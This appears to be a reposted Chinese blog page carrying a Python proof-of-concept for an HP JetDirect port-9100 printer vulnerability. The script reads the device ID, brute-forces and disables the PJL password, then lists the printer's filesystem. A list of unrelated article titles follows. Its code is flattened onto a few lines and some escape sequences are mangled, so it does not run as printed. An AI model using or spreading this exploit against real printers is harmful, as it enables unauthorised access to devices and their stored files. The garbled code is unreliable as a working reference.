#-*-coding=utf8-*-
import socket
import sys
def main():if len(sys.argv)<=1:print('Parameters error')returns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.settimeout(10)s.connect((sys.argv[1],9100))s.settimeout(None)# 发送读取设备ID的PJL指令s.send(('\033%-12345X@PJL INFO ID\r\n\033%-12345X\r\n').encode('UTF-8'))print(s.recv(1024).decode('UTF-8'))for i in range(1, 65536):buf = b''# 发送重置密码的PJL指令s.send(('33%-12345X@PJL \r\n@PJL JOB PASSWORD=' + str(i) + '\r\n@PJL DEFAULT PASSWORD=0 \r\n@PJL EOJ\r\n33%-12345X\r\n').encode('UTF-8'))if i%30 == 0:# 发送查询密码保护状态的PJL指令s.send(('\033%-12345X@PJL \r\n@PJL DINQUIRE PASSWORD\r\n\033%-12345X\r\n').encode('UTF-8'))while True:buf+=s.recv(1)print(buf)try:buf.index(b'\r\n\x0c')try:# 密码保护被禁用buf.index(b'DISABLED')print('password disabled ok!')# 发送查询目录的PJL指令s.send(('\033%-12345X@PJL \r\n@PJL FSDIRLIST NAME = "0:\\" ENTRY=1COUNT=99\r\n\033%-12345X\r\n').encode('UTF-8'))buf = b''while True:buf+= s.recv(1)print(buf)try:buf.index(b'\r\n\x0c')try:# 查询成功buf.index(b'ENTRY')print('PoC OK!')returnexcept ValueError:print('PoC NO!')returnexcept ValueError:continueexcept ValueError:print('password disabled faild!')finally:s.close()returnexcept ValueError:continues.close()
if __name__ == '__main__':main()

来源:http://www.secbox.cn/hacker/client/6450.html  代码太乱 仅把代码整理了下..找了2台测试,都显示socket .timed out

转载于:https://www.cnblogs.com/crac/p/5597239.html

hp_jetdirect 9100漏洞检测相关推荐

  1. HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...

    打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测  ...

  2. 漏洞检测,流量和性能监控

    漏洞检测,流量和性能监控 N essus Nessus 包括服务器和客户端两部分,可分开安装,也可以安装在一起,下是实验为安装在一台终端上 1.安装客户端,服务器 2.改变PATH,MANPATH路径 ...

  3. 文件包含漏洞检测工具fimap

    文件包含漏洞检测工具fimap 在Web应用中,文件包含漏洞(FI)是常见的漏洞.根据包含的文件不同,它分为本地文件包含漏洞(LFI)和远程文件包含漏洞(RFL).利用该漏洞,安全人员可以获取服务器的 ...

  4. Wapiti一款小巧的开源安全测试漏洞检测工具

    Wapiti 是一套 OpenSource 的站点漏洞检测工具,比较特殊的是,它并不依赖特征数据库,也因此扫描的速度相当快,而探测的则是一些共通性问题,或是作者所宣称的未知漏洞.Wapiti 其实是一 ...

  5. routersploit 路由器漏洞检测及利用框架

    RouteSploit框架是一款开源的漏洞检测及利用框架,其针对的对象主要为路由器等嵌入式设备. 框架功能 RouteSploit框架主要由可用于渗透测试的多个功能模块组件组成, 1. Scanner ...

  6. python代码检查工具_基于Python3的漏洞检测工具 ( Python3 插件式框架 )

    [TOC] Python3 漏洞检测工具 -- lance lance, a simple version of the vulnerability detection framework based ...

  7. 安卓拒绝服务漏洞分析及漏洞检测

    "超级拒绝服务漏洞"是一个安卓通用型拒绝服务漏洞,恶意***者可能利用此漏洞让手机中的任意应用崩溃无法正常工作,几乎影响目前市面上所有的安卓APP应用. 漏洞分析: 0xr0ot和 ...

  8. armitage识别不了漏洞_Shiro RememberMe 漏洞检测的探索之路

    前言 Shiro 是 Apache 旗下的一个用于权限管理的开源框架,提供开箱即用的身份验证.授权.密码套件和会话管理等功能.该框架在 2016 年报出了一个著名的漏洞--Shiro-550,即 Re ...

  9. python测验3_基于Python3的漏洞检测工具

    原标题:基于Python3的漏洞检测工具 Python3 漏洞检测工具 -- lance lance, a simple version of the vulnerability detection ...

  10. 漏洞检测方法如何选?详解源代码与二进制SCA检测原理

    摘要:本文探讨的是SCA具体的检测原理,源代码SCA检测和二进制SCA检测有哪些相同点和不同点,在进行安全审计.漏洞检测上各自又有什么样的优势和适用场景. 本文分享自华为云社区<源代码与二进制文 ...

最新文章

  1. Redis实战(12)订阅和发布消息
  2. QT的QDBusReply类的使用
  3. 田野中科院计算机网络信息中心,中国科学院计算机网络信息中心硕士生导师田野...
  4. 他在阿里的逆袭,只因为想做个“锤子”
  5. 堆载预压弹性变形怎样计算公式_一种风洞洞体堆载预压变形测量工艺的制作方法...
  6. 原子操作--sync/atomic的用法
  7. Windows 2003 EE升级服务错误号:0x8DDD0018 解决办法
  8. 作为一个Java开发者,java常用算法手册pdf
  9. 《左耳听风》读书笔记
  10. “请珍惜”震撼心灵的感动;当我们老了,还能一起真三么?
  11. 库存盘点遗失设备寻找中的个人收获
  12. vue cli js css压缩方案
  13. android app文件夹,android app文件目录结构
  14. 360做专业手机电商平台还是有搞头
  15. 重要更新|Amazon S3 和 CloudFront 已迁移至 Amazon Trust Services
  16. 【JavaEE】进入Web开发的世界-HTML
  17. 为啥在VS中使用scanf函数会有警告呢?如何解决此问题?(如何添加#define _CRT_SECURE_NO_WARNINGS 1)
  18. oracle数据库新建表增加表序列,设置id自增
  19. 一家之言——智慧城市“十三五”建设着眼点
  20. 挖个坑 - 魔法画图工具的设计

热门文章

  1. 支持自动识别快递公司批量查询物流、一键导出
  2. 程序开发里面的profile 是什么意思? (用户配置文件)
  3. 小度独立融资,百度上演“大象跳舞”
  4. android自定义秒表,Android:一个简单的秒表实现
  5. Ubuntu解压安装包及make命令相关操作(针对make: *** [btest] Error 127以及make: *** [btest] Error 1)
  6. 大学计算机教师招聘试讲什么,应聘高校教师面试,试讲注意事项
  7. 使用Excel时计算剩余时间
  8. R如何读取csv文件
  9. 电信光纤猫虚拟服务器设置方法,电信光纤猫与无线路由器连接的设置方法
  10. CleanMyMac X2023最新版安装图文详解